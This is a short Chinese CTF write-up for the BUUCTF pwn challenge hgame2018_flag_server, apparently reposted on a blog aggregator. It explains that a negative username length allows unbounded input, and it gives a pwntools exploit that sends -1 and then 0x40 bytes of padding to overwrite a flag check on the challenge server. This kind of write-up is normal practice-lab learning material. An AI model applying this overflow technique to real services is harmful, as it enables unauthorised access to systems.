[BUUCTF-pwn]——hgame2018_flag_server
生活随笔
收集整理的這篇文章主要介紹了
[BUUCTF-pwn]——hgame2018_flag_server
小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
[BUUCTF-pwn]——hgame2018_flag_server
保護(hù)開(kāi)啟了 NX和canary
看下反匯編,只要v10非0就可以得到flag, 也就是v6 = v8,但是顯然v8是一個(gè)隨機(jī)數(shù), 并且沒(méi)有找到可以修改的地方。
仔細(xì)觀察上面的代碼,一旦v5為負(fù)數(shù),我們就可以無(wú)限輸入了,并且s1距離v10為0x40 = 64, 我們只需要輸入0x40個(gè)字符就可以開(kāi)始修改v10了
exploit
from pwn import * p = remote("node3.buuoj.cn",28128) p.sendlineafter('your username length: ','-1') payload= 'a' * 0x40 + p32(1) p.sendlineafter('whats your username?\n',payload) p.interactive()總結(jié)
以上是生活随笔為你收集整理的[BUUCTF-pwn]——hgame2018_flag_server的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: [BUUCTF-pwn]——ciscn_
- 下一篇: [BUUCTF-pwn]——picoct